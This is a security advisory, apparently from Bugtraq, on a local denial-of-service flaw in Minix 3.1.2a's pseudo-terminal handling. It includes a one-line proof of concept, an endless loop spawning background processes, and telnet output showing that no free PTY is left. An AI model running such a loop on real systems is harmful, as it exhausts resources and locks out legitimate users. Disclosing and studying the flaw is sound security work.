Minix Pseudo Terminal Denial of Service Vulnerability
BID:30357
Info
| Bugtraq ID: | 30357 |
| Class: | Design Error |
| CVE: | |
| Remote: | No |
| Local: | Yes |
| Published: | Jul 23 2008 12:00AM |
| Updated: | Jul 24 2008 02:18AM |
| Credit: | kokanin |
| Vulnerable: | Minix Minix 3.1.2a |
| Not Vulnerable: | |
Discussion
Minix is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to prevent users from opening new pseudo terminals, denying service to legitimate users.
Minix 3.1.2a is vulnerable; other versions may also be affected.
Exploit / POC
An attacker can use readily available command-line utilities to exploit this issue.
The following proof of concept is available:
$ uname -a
Minix 192.168.1.2 3 1.2a i686
$ while true ; do (yes "yes yes minix uh ah"&) ; done
[snip snip]
$ ^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C
...disconnected
telnet 192.168.1.2
Trying 192.168.1.2...
Connected to 192.168.1.2.
Escape character is '^]'.
I am sorry, but there is no free PTY left!
Connection closed by foreign host.
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].